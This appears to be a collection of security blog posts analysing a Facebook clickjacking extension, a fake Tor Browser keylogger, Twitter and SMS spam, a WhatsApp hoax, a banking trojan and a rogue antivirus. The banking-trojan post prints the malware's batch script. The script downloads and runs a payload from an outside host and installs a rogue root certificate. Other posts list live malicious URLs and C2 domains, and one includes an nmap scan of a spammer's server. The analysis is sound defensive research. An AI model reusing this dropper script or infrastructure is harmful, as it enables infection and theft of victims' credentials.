'Business Flash Player' appear to be Facebook spammer

Just received this wild Facebook post that suddenly tagged me for unknown reason. Its look like a community page that received 87 million user 'Like' on it. That's something fishy to me.

This look suspicious to me when the provided URL is unreadable to me. Obviously it is in unicode character or IDN. It's Armenian language there (ask Google translate or Wikipedia).

Well, lets check it out whats so special about this FB post. Once you click on that weird URL you will be redirected to the fastotolike.com. The website looks like some kind of 'auto-like' or click jacking script.

If you click anywhere on the page you will be prompted another strange popup (I'm using Google Chrome for this test). The popup message prompt you to install some kind of plug-in or extension for Chrome. There is multiple popup open up 8 times according to its javascript. See image below:

Looking at the source code you will find there is Turkish language hoping that user will click the 'Add' button.

It's look like the app is available at Google Web Store and disguise as 'Business Flash Player !' With no description and no screenshot, definitely looks fishy. See image below:

If you try to install it you will see your extension appear in the Chrome Extensions list.

Lets take a look on installed extension source code. There is two link which is one of it will be redirect to malicious website. See image below:

The redirect URL will be go to the http://fastotolike.com/yeni.php which is some how reveal its long line comment source code. So, for this test I just uncomment the js code and make it beautiful.

This script is look like responsible to post a spam to the victim user Facebook wall. The post appear to be submit along with picture of random girl dancing on Youtube.

Analysis on TOR_Browser malware

694DD57886B32AD850224A783198D9FE, 10D52767B537B2F9F564481665B029E6, 761EA80A1C0019D6CB606BB646EBE57F

The sample has been already circulated around few weeks ago. But still found less information about this malware on internet. Thus, I decide to make some quick analysis.

Basic File Information

Received filename : Tor_Browser.exe
Original Filename : suf70_launch.exe
Executable vendor : Indigo Rose Corp.
File size : 707,793 bytes

MD5 hash received from report:

694DD57886B32AD850224A783198D9FE (Installer file 707,793 bytes) 10D52767B537B2F9F564481665B029E6 (Malicous PE file 9,080 bytes) 761EA80A1C0019D6CB606BB646EBE57F (Malicous PE file 74,240 bytes)

MD5 hash from official website:

Official installer file is about 22MB size while the sample is only 700kb.

Summary

The sample that we received is in PE installer file. Using TOR Project file icon. While in installation wizard, user will notice that there is no EULA appear on the screen:

The installer file is a malware dropper. Upon finished installation, the malware will not execute itself automatically. Thus, it will need user interaction to reboot their PC or run it manually from Start Menu.

If user run it from Start Menu, it will run itself from C:\Program Files\Tor Browser\Tor_Browser.exe. This PE file will then run another process from the following location:

C:\Users\<user profile>\AppData\Local\Temp\explorer.exe

Then run the %RANDOMNAME%.bat dropped at Windows Temporary folder. This will delete the previous file Tor_Browser.exe after the process has been terminated.

The running fake explorer.exe process will doing several malicious activity including keylogger, save keystroke in encrypted form, resolve IP into malware author DNS.

The explorer.exe will remain it process in memory.

Process Activity

Upon execution of the sample its create the following mutex:

XXXXOOOO

This will make sure only single process of itself is running.

File & folder

Upon installation the following file has been created:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tor Browser\
    жÔØ Tor Browser.lnk
    Tor_Browser.lnk

C:\Users\<user profile&gt>\AppData\Roaming\Help\
    CREATELINK.EXE (Legit file use to create a shortcut link)
    iexplore.exe
    IconCacheBt.DAT (Encrypted fake explorer.exe file)
    IconConfig.DAT (Encrypted keylogger configuration)

C:\Program Files\Tor Browser\Tor_Browser.exe
C:\Windows\Tor Browser\uninstall.exe -- Non-malicious file
C:\Users\<user profile>\AppData\Local\Temp\explorer.exe

This malware sample also create a shortcut link as a startup to the following folder:

C:\Users\<userprofile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The shortcut file will be linked to the following file location:

C:\Users\<userprofile>\AppData\Roaming\Help\iexplore.exe

Windows Registry

The malware will create the following registry key:

HKCU\Software\Microsoft\Windows\DbxUpdateBT
"Mark"="ay"

NOTE: This registry key use to mark the current machine as already infected.
The malware also read the following registry key:

HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\

and try to read the following value "~MHz". This value is storing a current CPU speed.


Keylogger Activity

Save key stroke from user input to the following file:

C:\Users\<user profile>\AppData\Local\Temp\win_32.sys

All captured key stroke is saved in encrypted form (Using compression library).

Network

Trying to connect to the following IP:

222.82.13.89:80

Domain name found on the malware. Trying to resolve IP from the following DNS:

 mychangeip1.ddns.info
 mychangeip.ddns.us

Miscellaneous

The malware sample (iexplore.exe) also contain a digital certificate embedded to it while fake explorer.exe does not have any digital certificate.

The digital certificate may be stolen and has been revoked.

Twitter Spam Bot 'Seducing' You

Well, not directly seduce you. It will mentioning your name on twitter first. It's almost a week after receiving several Tweet post that suddenly mentioned my nickname on my Twitter account. It is look suspicious when these person is not even following me. The text message also has nothing to do with my interest.

By the time I wrote this blog post, those spammer still actively tweet and randomly mentioning peoples name. Average sending around 20 tweet post per day.

As I post this screenshot it is not only that name keep randomly mentioning people but there is several others spammer using different name but almost the same message produced by their spam 'bot'. Virus Bulletin guys also send some screenshot regarding this twitter spam activity. http://twitpic.com/bg0rgm

Most of spam 'bot' name is starting with prefix 'Caprigalxxx' ('x' could be random alphabet & number). But it could be other name also. Those 'random' account name is really exists and always use seduce picture to attract more people following them.

Here it is another example screenshot. Most of those spammer account always looks like this.

Investigation behind Malaysian SMS spam with .jar attachment (0195451395).

I constantly received SMS spam message with .jar as an attachment. This is happened several times within 3 months. So, I decided to make some digging on who is the person behind this activity.

The phone number used by the spammer:
+6019-5451395 (Can be several other phone numbers)

The SMS message contain a URL which is will redirect to another server that provide a download link:
hxxp://bit.ly/RuMmBi ---> hxxp://203.223.148.215/R340.jar

The .jar file look suspicious and inappropriate way to promote sometime with such attachment. Lets try to access on IP 203.223.148.215 with browser.

The IP 203.223.148.215 is resolved to domain name www.smsgateway.cc . Seem like it's running with IIS on Windows machine. Now lets NMAP it.

Host is up (0.011s latency).
Not shown: 979 closed ports
PORT      STATE    SERVICE        VERSION
21/tcp    open     ftp            Microsoft ftpd
25/tcp    filtered smtp
80/tcp    open     http           Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 - Forbidden: Access is denied.
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
1026/tcp  filtered LSA-or-nterm
1027/tcp  filtered IIS
1433/tcp  open     ms-sql-s       Microsoft SQL Server 2008
2383/tcp  open     ms-olap4?
3389/tcp  open     microsoft-rdp  Microsoft Terminal Service
4444/tcp  filtered krb524
6129/tcp  filtered unknown
6667/tcp  filtered irc
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49160/tcp open     msrpc          Microsoft Windows RPC
49161/tcp open     msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servi
t.cgi :
SF-Port1433-TCP:V=5.51%I=7%D=9/1%Time=50421EB0%P=i686-pc-windows-windows%r
SF:(ms-sql-s,25,"\x04\x01\0%\0\0\x01\0\0\0\x15\0\x06\x01\0\x1b\0\x01\x02\0
SF:\x1c\0\x01\x03\0\x1d\0\0\xff\n2\x06@\0\0\0\0");
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista (94%), FreeBSD 6.X (86%)
Aggressive OS guesses: Microsoft Windows Server 2008 SP2 (94%), Microsoft Windows 7 (94%), Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7 (94
oft Windows Server 2008 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 7 Professional (93%), Microsoft Windows Server 2008 Beta 3 (93%), Micro
ws 7 Ultimate (92%), Microsoft Windows Vista Business SP1 (91%), Microsoft Windows Vista Home Premium SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
Service Info: OS: Windows

TRACEROUTE (using port 8888/tcp)
HOP RTT      ADDRESS
1   8.00 ms  60.53.173.202
2   5.00 ms  115.132.110.213
3   5.00 ms  115.132.110.213
4   8.00 ms  10.55.36.118
5   12.00 ms ge-0-1.edge-gw-1-kul-sip.my.globaltransit.net (61.11.210.174)
6   11.00 ms 203.223.148.215

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds

Well, the following is the only port that can be accesses by public:

21/tcp    Microsoft ftpd
80/tcp    Microsoft IIS httpd 7.5
1433/tcp  Microsoft SQL Server 2008
2383/tcp  ms-olap4?
3389/tcp  microsoft-rdp  Microsoft Terminal Service
49152/tcp Microsoft Windows RPC
49153/tcp Microsoft Windows RPC
49154/tcp Microsoft Windows RPC
49155/tcp Microsoft Windows RPC
49160/tcp Microsoft Windows RPC
49161/tcp Microsoft Windows RPC

Now we need to take a look on the .jar file. First of all let see how it's look like when running on the phone. In this case I use Nokia Emulator.

Once victim user run the spam app it will instantly popup a message to send a message to the 33375 number. If user click/tap on Yes button it will automatically subscribe RM3.00 for another spam data. Your credit will be 'stolen' for RM3.00 monthly.

As the details SMS traffic shown on the image above. Let's take a look on .jar source code below:

The variables paramString1 and paramString3 will corresponds to the manisfest file.

If we take a look on 'c' class on the source code there is another shorten link which is will redirect to their Terms and Conditions web page.

The shortened link will be redirect as the following:
hxxp://bit.ly/Mubvpe ---> hxxp://progain.smsgateway.cc/tnc.html

Based on their TnC, it seem that Million Progain Sdn Bhd (916763-X) is responsible for receiving payment from the user. Several TnC also has been violated by this company. I'll keep the details about this company because it seem lead to more abusive services.

Whatsapp Hoax Message Still in Circulation

It seem that a viral message still in circulated around my Whatsapp with hoax content. It has been a few months already since it first appearance on January 2012. Hopefully no more forwarded message like this again.

Full hoax message:

Message from Jim Balsamic (CEO of Whatsapp) we have had an over usage of user names on whatsapp Messenger. We are requesting all users to forward this message to their entire contact list. If you do not forward this message, we will take it as your account is invalid and it will be deleted within the next 48 hours. Please DO NOT ignore this message or whatsapp will no longer recognise your activation. If you wish to re-activate your account after it has been deleted, a charge of 25.00 will be added to your monthly bill. We are also aware of the issue involving the pictures updates not showing. We are working diligently at fixing this problem and it will be up and running as soon as possible. Thank you for your cooperation from the Whatsapp team” WhatsApp is going to cost us money soon. The only way that it will stay free is if you are a frequent user i.e. you have at least 10 people you are chatting with. To become a frequent user send this message to 10 people who receive it (2 ticks) and your WhatsApp logo

Whatsapp is already announced that this is really hoax through their blog.  http://blog.whatsapp.com/index.php/2012/01/it-is-a-hoax-really-it-is/ .

Trojan Banker/Password Stealer (B99A6FF84E4404488D789F5D56593735)

Yesterday, I just found one of local website has been compromised and embedded with malicious code. Once user visiting the website, by allowing the Java applet the malware will be downloaded and installed.

The picture above show you that you will be prompted to use Java plug-in to use some 'features' on this website. Lets take a look on the webpage source code. The red highlighted on the picture below is a Windows Batch command that will drop a VB Script file allowing it to download another malware (Windows executable) from Israel website. The website is also possibly has been compromised.

As we can see, the main page of the website has been embedded with extra code. At the top of it is calling the Java applet (Dantas.jar). This Java applet help to run the Windows Batch command. Below is the Java applet code.

If the Windows Batch Command successfully executed, it will save all the VBScript code into Windows temporary directory as a eden.vbs. Then, run the eden.vbs file to perform download and run the malware executable file.

At the bottom of the website also has been embedded with some scam pharma viagra hyperlink.

Now we need to take a look closer on the PE file downloaded from the following link:

hxxp://www.kanibar.co.il/tmp/DSC12012PDF.exe (a1d2a281980fdd75546557a9ba6de0a6)

The PE file is actually a SFX file. It is containing several file including certificate from the malware author.

FileName	MD5	Desc.
certadm.dll	AED39116FE12C5550975043DA1D1B244	Microsoft Certificate Services Admin
certnew.cer	2B742FEB1883EE5CB418B1CBAB145A7D	Fake Security Certificate
certutil.exe	711DB2EF10B6C2AB2080698AEC6C6D08	Cert Util.exe
givetome.exe	6D2C398E03397C9D089EDC0F00AB3FCB	http://noeld.com/programs.asp
jeovahjireh.exe	0B2BF362548B244477D9FFB613AF54D4	Malware

The only file are suspicious is 'jeovahjireh.exe'. So we need to take a look closer on this. The file is compressed with UPX 3.07. The PE file is actually some kind of Bat2Exe file binder. Inside the PE file contain Windows Batch Command.

@shift
@break off

echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat



set inf=0
set exe="%temp%\msavc.exe"


if exist %temp%\%USERNAME%.dll goto mapa

> %temp%\%USERNAME%.dll echo y


:mapa
%temp%\givetome.exe http://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP "%exe%"

del "%temp%\leiame.txt"

ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer

cmd.exe /c "%exe%"

del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe

echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat

. . .

echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat

The code is a bit lengthy and some kind of semi obfuscated. Most of the code are useless. I just cut off some of the junk code.

What the Windows Batch Command do is actually download another PE file from the following URL:

hxxp://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP

The *.jip file will be named as 'msavc.exe' and saved in temp directory. After that it will add the 'certnew.cer' certificate onto the infected machine as a root.

Then, it execute the 'msavc.exe' using cmd.exe. All bundled file will be delete then (certnew.cer, certadm.dll, certutil.exe, givetome.exe).

Now we need to take a look on the new downloaded PE file (B99A6FF84E4404488D789F5D56593735) named as 'msavc.exe'. This file has been packed with UPX 3.08 and written with Borland Delphi.

Based on VirusTotal result the PE file is possibly a trojan stealer, password stealer or trojan banker. Which is stealing user information on victim PCs.

https://www.virustotal.com/file/7802350f5052b8e5d8e13eda728ee28586b94b09fca05bd8f0e3abe0b6e49b1f/analysis/1344927303/

As we can see on the network traffic it will try to access to the following URL followed with parameter content:

hxxp://www.snv1r1.net/2k12v3r1/71164BED09340ABE6D4C69BD.php?op=7A0B4EED571641ED7E277EBE704E09DA3C5D3E

The domain name is still active but the content of the given URL is not available anymore.

Several mutex also created by this malware. The malware also crawling into several sensitive directory.

It also make changes on a lot of places on Windows registry to lower the security setting and get internet settings information.

Online Sandbox Result:
1. https://www.virustotal.com/file/d15d650d4bf08626af7a4e5322c967fb0e3ca23805d9da6904f5f8ee88f0c55b/analysis/
2. http://malwr.com/analysis/a1d2a281980fdd75546557a9ba6de0a6/

Live Security Platinum (RougeAV)

Just couple of weeks ago I just receive a rouge av sample the disguise as 'Live Security Platinum'. Although this malware is already discovered by other people few months ago. Once this malware is installed all your executable file will be mark as 'infected'. None of your file can be executed until you purchase their 'security' antivirus program. Lets take a look a basic dynamic analysis here. In this write up I'm not covering in detail about removing it from your system.

The malware that I received is from a compromised website that has been embedded with java object file that require users to allow their browser to execute the .jar file. This .jar file will the download the .exe install of the 'Live Security Platinum' malware.

The snapshot above show the first run of the malware which is check the latest update, download an install. The installed path will be located on user program data. See the image below.

After finished install it will automatically doing a fake 'scan'. At this time, all your application cannot be execute and has been blocked by the malware.

If you try to run any application on your computer, you will get fake notification that say your computer has been infected by 'malware'.

It will keep remind you to update and purchase their 'software'.

Lets give a try by entering a valid serial number to this malware registration form. The key that I was entered is AA39754E-715219CE. This key is already circulated on the internet. So, I just use it for easy removing the infection.

Once you click on 'Activate' button you will prompt about your successful register their 'product'. All your application now can be able to run normally. Now you will notice that the rouge AV window has been change to light blue color and there an extra shortcut icon on your desktop. It is a shortcut URL to access to the malware website.

If we try to open up the URL you will see there is online user guide for user to read. Until now the website is still accessible to the user.

For removal, MalwareBytes Anti-Malware would be fine to clean all the infection.